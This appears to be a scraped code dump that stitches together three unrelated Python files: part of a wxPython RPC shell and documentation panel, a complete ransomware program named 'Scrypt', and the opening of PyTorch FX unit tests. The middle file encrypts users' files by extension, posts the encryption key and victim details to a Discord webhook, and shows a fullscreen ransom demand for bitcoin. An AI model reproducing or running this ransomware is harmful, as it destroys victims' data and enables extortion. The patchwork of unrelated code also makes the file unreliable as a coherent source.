self.parent_frame.Bind(wx.EVT_MENU, self.OnPopupNetworkItemSelected, item)
except Exception as e:
self.parent_frame.Log("Unable to load the network list" , type="warning")
#print("refreshNetworkMenuItemList() " + str(e))
pass
#if self.getAutoSwitchStateIsChecked() :
#else:
def OnPopupNetworkItemSelected(self, event):
item = self.rpcConnexions_dropdown_menu.FindItemById(event.GetId())
text = item.GetItemLabelText()
#print(self.rpcConnexions_autoswitch.GetState())
if self.getAutoSwitchStateIsChecked() :
self.parent_frame.ConnexionManager.setCurrentConnexion(text)
else:
self._currentLocalNetworkName = text
self._currentLocalNetworkIcon= self.parent_frame.ConnexionManager.getIcon(self._currentLocalNetworkName)
self.setStatusBarActiveNetwork()
#Todo = change local icon !
def UpdateView(self):
self.setStatusBarActiveNetwork("")
self.refreshNetworkMenuItemList()
def setStatusBarActiveNetwork(self, networkName=''):
#if autottogle we read plugin data, else local panel
if self.getAutoSwitchStateIsChecked() :
#networkName= self.parent_frame.ConnexionManager.getCurrent()
networkName = self.parent_frame.GetPluginData("RavenRPC", "current_connexion")
#icon = self.parent_frame.ConnexionManager.getIcon(networkName)
icon = self.parent_frame.GetPluginData("RavenRPC", "_icon")
self.rpcConnexions_dropdown_button.SetBitmap(icon)
else:
#networkName = self._currentLocalNetworkName
#icon = self.ConnexionManager.getIcon(networkName)
self.rpcConnexions_dropdown_button.SetBitmap(self._currentLocalNetworkIcon)
self.Layout()
def OnAutoswitchChanged(self, event):
#print("swtichedauto " + str(self.getAutoSwitchStateIsChecked()))
self.setStatusBarActiveNetwork("")
self._autowsitchNetwork = self.getAutoSwitchStateIsChecked()
def getAutoSwitchStateIsChecked(self):
res=False
if self.m_auiToolBar1.GetToolToggled(self.rpcConnexions_autoswitch.GetId()):
#if self.rpcConnexions_autoswitch.GetState() in [32 ,34 ] :
res=True
return res
def OnNewTerminal(self, event):
self.defaultShell()
def OnCloseTerminal(self, event):
cp = self.wxRavenAdvancedShellPanelNotebook.GetCurrentPage()
cpi = self.wxRavenAdvancedShellPanelNotebook.GetPageIndex(cp)
self.wxRavenAdvancedShellPanelNotebook.DeletePage(cpi)
def OnRPCHelp(self, event):
if self.helpCommandPannel == None:
#print("None")
newHelpPanel = ShellDocumentationHelper(self.parent_frame, position="wxRavenAdvancedShellPanelNotebook")
#self.wxRavenAdvancedShellPanelNotebook.AddPage(newHelpPanel, "RPC Command List", bitmap = newHelpPanel.icon)
_panIcon = self.parent_frame.RessourcesProvider.GetImage(newHelpPanel.icon)
self.wxRavenAdvancedShellPanelNotebook.AddPage(newHelpPanel, "RPC Command List", bitmap = _panIcon)
self.helpCommandPannel = newHelpPanel
#self.helpCommandPannel.FillHelpDocumentationTreebook()
else:
#self.helpCommandPannel.FillHelpDocumentationTreebook()
print("already")
pass
class ShellDocumentationHelper(wxRavenShellDocumentation):
'''
classdocs
'''
view_base_name = "RPC Documentation Helper"
view_name = "RPC Documentation Helper"
default_position = "main"
icon = 'bookmarks_view' #wx.Bitmap( u"res/default_style/normal/bookmarks_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "main", viewName= "RPC Documentation Helper"):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Left() .Caption( u"wxRavenFrame" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
"""
parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Bottom() .Caption( u"> Shell" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
parentFrame.m_mgr.Update()
parentFrame.Centre( wx.BOTH )
"""
self.view_base_name = "RPC Documentation Helper"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._cursor = 0
#self.helpCommandPannel.FillHelpDocumentationTreebook()
#parentFrame.Add(self, self.view_name ,position, self.icon)
if position != "wxRavenAdvancedShellPanelNotebook":
parentFrame.Add(self, self.view_name ,position, self.parent_frame.RessourcesProvider.GetImage(self.icon))
self.SetupTreebook()
self.FillHelpDocumentationTreebook()
self.Show()
"""
def LoadHelpDocumentation_T(self, networkName=""):
t=threading.Thread(target=self.LoadHelpDocumentation)
t.start()
def LoadHelpDocumentation(self):
pass
"""
def OnSearch(self, evt):
self.FillHelpDocumentationTreebook()
#self.search.GetValue()
def SetupTreebook(self):
self.il = wx.ImageList(16, 16)
self.defaultIcon = self.il.Add(self.parent_frame.RessourcesProvider.GetImage(self.icon))
self.m_customControl2.AssignImageList(self.il)
def UpdateView(self):
pass
def CleanTree(self):
while self._cursor>0:
#print(self._cursor)
self.m_customControl2.DeletePage(self._cursor-1)
self._cursor = self._cursor-1
def FillHelpDocumentationTreebook(self):
#
# TODO: wrap this in a try and retry
#
self.m_customControl2.Freeze()
#self.m_customControl2.Thaw()
self.CleanTree()
self._cursor = 0
filterSearch = self.m_searchCtrl1.GetValue()
if len(filterSearch) < 2 :
filterSearch=""
#print(filterSearch)
try:
#self.GetPlugin("General").Log(message , source, timestamp, type)
_CmdList= self.parent_frame.GetPluginData("RavenRPC","_CmdList")
#print("Fill")
for _cmd in _CmdList:
#print(_cmd)
if filterSearch != "" :
if not filterSearch.__contains__('*') and (not _cmd.__contains__(filterSearch) ) :
continue
elif filterSearch.__contains__('*') :
_replaceStr = filterSearch.replace('*', '')
if (not _cmd.__contains__(_replaceStr) and not _CmdList[_cmd].__contains__(_replaceStr) ) :
continue
_commandeHelperPanel = ShellCommandDescriberPanel(self.m_customControl2, _CmdList[_cmd])
self.m_customControl2.AddPage(_commandeHelperPanel, _cmd, imageId=self.defaultIcon)
self._cursor = self._cursor +1
except Exception as e:
#print("FillHelpDocumentationTreebook :" + str(e))
self.parent_frame.Log("Unable to load the commands list" , type="warning")
self.m_customControl2.Thaw()
self.Layout()
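# Illustration of the search filter used in FillHelpDocumentationTreebook above
# (the command names are hypothetical):
#   "getbalance"  -> keeps only commands whose name contains "getbalance"
#   "*balance"    -> the '*' is stripped; keeps commands whose name OR help text contains "balance"
#   "a"           -> shorter than 2 characters, treated as empty: every command is listed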
class ShellCommandDescriberPanel(wxRavenShellCommandDescriber):
def __init__(self, parent, desc):
wxRavenShellCommandDescriber.__init__(self, parent)
self.cmdHelper.SetValue(desc)
|
Scrypt.py
|
import PyQt5
import PyQt5.QtWidgets
import PyQt5.QtCore
import sys
import requests
import random
import string
import threading
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os
import shutil
btcAdd = ""
email = ""
discordWebhook = ""
fileTypes = ['.txt','.exe','.php','.pl','.7z','.rar','.m4a','.wma','.avi','.wmv','.csv','.d3dbsp','.sc2save','.sie','.sum','.ibank','.t13','.t12','.qdf','.gdb','.tax','.pkpass','.bc6','.bc7','.bkp','.qic','.bkf','.sidn','.sidd','.mddata','.itl','.itdb','.icxs','.hvpl','.hplg','.hkdb','.mdbackup','.syncdb','.gho','.cas','.svg','.map','.wmo','.itm','.sb','.fos','.mcgame','.vdf','.ztmp','.sis','.sid','.ncf','.menu','.layout','.dmp','.blob','.esm','.001','.vtf','.dazip','.fpk','.mlx','.kf','.iwd','.vpk','.tor','.psk','.rim','.w3x','.fsh','.ntl','.arch00','.lvl','.snx','.cfr','.ff','.vpp_pc','.lrf','.m2','.mcmeta','.vfs0','.mpqge','.kdb','.db0','.mp3','.upx','.rofl','.hkx','.bar','.upk','.das','.iwi','.litemod','.asset','.forge','.ltx','.bsa','.apk','.re4','.sav','.lbf','.slm','.bik','.epk','.rgss3a','.pak','.big','.unity3d','.wotreplay','.xxx','.desc','.py','.m3u','.flv','.js','.css','.rb','.png','.jpeg','.p7c','.p7b','.p12','.pfx','.pem','.crt','.cer','.der','.x3f','.srw','.pef','.ptx','.r3d','.rw2','.rwl','.raw','.raf','.orf','.nrw','.mrwref','.mef','.erf','.kdc','.dcr','.cr2','.crw','.bay','.sr2','.srf','.arw','.3fr','.dng','.jpeg','.jpg','.cdr','.indd','.ai','.eps','.pdf','.pdd','.psd','.dbfv','.mdf','.wb2','.rtf','.wpd','.dxg','.xf','.dwg','.pst','.accdb','.mdb','.pptm','.pptx','.ppt','.xlk','.xlsb','.xlsm','.xlsx','.xls','.wps','.docm','.docx','.doc','.odb','.odc','.odm','.odp','.ods','.odt','.sql','.zip','.tar','.tar.gz','.tgz','.biz','.ocx','.html','.htm','.3gp','.srt','.cpp','.mid','.mkv','.mov','.asf','.mpeg','.vob','.mpg','.fla','.swf','.wav','.qcow2','.vdi','.vmdk','.vmx','.gpg','.aes','.ARC','.PAQ','.tar.bz2','.tbk','.bak','.djv','.djvu','.bmp','.cgm','.tif','.tiff','.NEF','.cmd','.class','.jar','.java','.asp','.brd','.sch','.dch','.dip','.vbs','.asm','.pas','.ldf','.ibd','.MYI','.MYD','.frm','.dbf','.SQLITEDB','.SQLITE3','.asc','.lay6','.lay','.ms11(Securitycopy)','.sldm','.sldx','.ppsm','.ppsx','.ppam','.docb','.mml','.sxm','.otg','.slk','.xlw','.xlt','.xlm','.xlc','.dif','.stc','.sxc','.ots','.ods','.hwp','.dotm','.dotx','.docm','.DOT','.max','.xml','.uot','.stw','.sxw','.ott','.csr','.key','wallet.dat']
class Ransomware(PyQt5.QtCore.QRunnable):
def __init__(self):
super(Ransomware, self).__init__()
self.threadpool = PyQt5.QtCore.QThreadPool()
self.randomId = self.rID(12)
self.encryptionPass = self.rSeed(32)
self.filePath = "C:\\Users\\"
self.ip = ""
self.userName = ""
self.crypto = AES.new(self.encryptionPass.encode(), AES.MODE_ECB)
def readMe(self):
try:
f = open(f"C:\\Users\\{self.userName}\\Desktop\\readme.txt","w+")
f.write(note)
except:
pass
def getUserDetails(self):
try:
self.ip = requests.get("https://api.ipify.org?format=json").json()["ip"]
self.userName = os.getlogin()
except:
pass
def encryptFile(self, file):
try:
with open(file, 'rb') as infile:
content = self.crypto.encrypt(pad(infile.read(),32))
with open(file, "wb") as outfile:
outfile.write(content)
outfile.close()
except:
pass
def run(self):
self.sendMessage()
for root, directories, files in os.walk(self.filePath):
for filename in files:
filepath = os.path.join(root, filename)
for base in fileTypes:
if base in filepath:
threading.Thread(target=self.encryptFile, args=(filepath,)).start()
self.readMe()
def sendMessage(self):
try:
self.getUserDetails()
except:
pass
data = {
"embeds": [
{
"title": "**__Victim Report__:**",
"description": f"```css\nUSERID: {self.randomId}``` ```css\nKEY: {self.encryptionPass}``` ```css\nUSERNAME: {self.userName}``` ```css\nIP: {self.ip}```",
"color": 13959168,
"thumbnail": {
"url": "https://www.pngkit.com/png/full/168-1680567_69137579-pentagram-with-demon-baphomet-satanic-goat.png"
},
"author": {
"name": "Scrypt",
"icon_url": "https://i.imgur.com/F3j7z5K.png"
}
}
]
}
r = requests.post(discordWebhook, json=data)
def rSeed(self, stringLength):
password_characters = string.ascii_letters
return ''.join(random.choice(password_characters) for i in range(stringLength))
def rID(self, stringLength):
password_characters = string.ascii_letters + string.digits
return ''.join(random.choice(password_characters) for i in range(stringLength))
class Scrypt(PyQt5.QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.threadpool = PyQt5.QtCore.QThreadPool()
self.initUI()
self.banner()
self.cont()
self.readMe()
self.show()
self.threadpool.start(Ransomware())
def initUI(self):
self.setWindowFlags(PyQt5.QtCore.Qt.WindowCloseButtonHint | PyQt5.QtCore.Qt.WindowType_Mask)
self.showFullScreen()
self.banner()
self.setStyleSheet("""
QMainWindow{
background-color: #212121;
}
""")
def cont(self):
btn = PyQt5.QtWidgets.QPushButton('Continue', self)
btn.resize(750,50)
btn.move((self.frameGeometry().width())/3.35, 900)
btn.setStyleSheet("""
QPushButton{
background-color: #d50000;
border-radius: 7.5px;
font-weight: 1200;
font-size: 18px;
}
QPushButton::hover {
background-color: #9b0000;
}
""")
btn.show()
btn.clicked.connect(self.hide)
def readMe(self):
rm = PyQt5.QtWidgets.QLabel(ransomNote, self)
rm.setStyleSheet("""
QLabel{
background-color: #d50000;
color: #000000;
border: 2px solid #ff5131;
border-radius: 7.5px;
font-weight: 1200;
font-size: 18px;
}
""")
rm.resize(750,650)
rm.move(self.frameGeometry().width()/3.35, 220)
rm.setAlignment(PyQt5.QtCore.Qt.AlignCenter)
rm.show()
def banner(self):
flair = PyQt5.QtWidgets.QLabel('Scrypt', self)
flair.setStyleSheet("""
QLabel{
background-color: #d50000;
color: #000000;
border: 2px solid #ff5131;
border-radius: 7.5px;
font-weight: 1400;
font-size: 45px;
}
""")
flair.resize(800,130)
flair.move(self.frameGeometry().width()/3.5, 50)
flair.setAlignment(PyQt5.QtCore.Qt.AlignCenter)
flair.show()
@PyQt5.QtCore.pyqtSlot()
def hide(self):
self.setWindowOpacity(0)
detailedNote =f"""
-------------------------------------------------------------------------------------------------------------------------
Hello,\n
If you are reading this then you have likely been hit by Scrypt Ransomware\n
We apologize for the incovience, at the end of the day we just want to get paid\n
In order to receive the decrypter you must follow the following steps to truely recover\n
all your files.\n
1. Download BitPay: https://bitpay.com/wallet/ if you are using a different wallet thats fine.\n
2. Send $50 to this address: {btcAdd}\n
3. After sending it wait for a confirmation and send us an email and include your UniqueID: {Ransomware().randomId}\n
4. Wait shortly, you will receive an email with your decrypter once everything is handled.\n
5. If we do not receive payment within 2 weeks we will no longer be handeling support.
-------------------------------------------------------------------------------------------------------------------------
"""
ransomNote = f"""
All Your Files Have Been Encrypted\n
At the end of the day we just want to get paid\n
Here are the instructions to get getting your files back\n
1. Pay $50 btc to the listed address\n
2. Send an email and include your unique id\n
3. Wait\n
------------------------------------\n
Check your desktop for readme.txt if you are lost!\n
------------------------------------\n
BTC Address: {btcAdd}\n
Email: {email}\n
UniqueID: {Ransomware().randomId}\n
------------------------------------\n
Click the Button Below To Continue:
(Killing this program will result in a full lose of files)\n
"""
if __name__ == "__main__":
app = PyQt5.QtWidgets.QApplication(sys.argv)
l = Scrypt()
sys.exit(app.exec())
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import warnings
import unittest
from math import sqrt
from pathlib import Path
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap
import torch._C._fx # type: ignore
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from torch.fx.proxy import TraceError
from fx.quantization import Quantizer
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Set, Tuple, Union
from torch.testing._internal.common_utils import run_tests, TEST_WITH_ROCM, IS_WINDOWS, IS_SANDCASTLE, IS_MACOS
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision.models import resnet18
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
@wrap
def wrapped_via_decorator(a):
return a + 1
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
class TestFX(JitTestCase):
def setUp(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
return
torch_root = Path(__file__).resolve().parent.parent
p = torch_root / 'build' / 'lib' / 'libtorchbind_test.so'
torch.ops.load_library(str(p))
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
@skipIfNoTorchVision
def test_resnet(self):
resnet = resnet18()
resnet.train()
res_graph = symbolic_trace(resnet)
res_script = torch.jit.script(res_graph)
ip = torch.rand(1, 3, 224, 224)
a = resnet(ip)
b = res_graph(ip)
c = res_script(ip)
self.assertEqual(a, b)
self.assertEqual(a, c)
quantizer = Quantizer(res_graph)
for i in range(10):
quantizer.observe((torch.rand(1, 3, 224, 224),))
qgraph = quantizer.quantize()
qgraph.graph.lint()
qgraph_script = torch.jit.script(qgraph)
d = qgraph(ip)
e = qgraph_script(ip)
assert (a - d).abs().max() < 2
self.assertEqual(d, e)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.Tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_allclose(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_allclose(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_symbolic_trace_sequential(self):
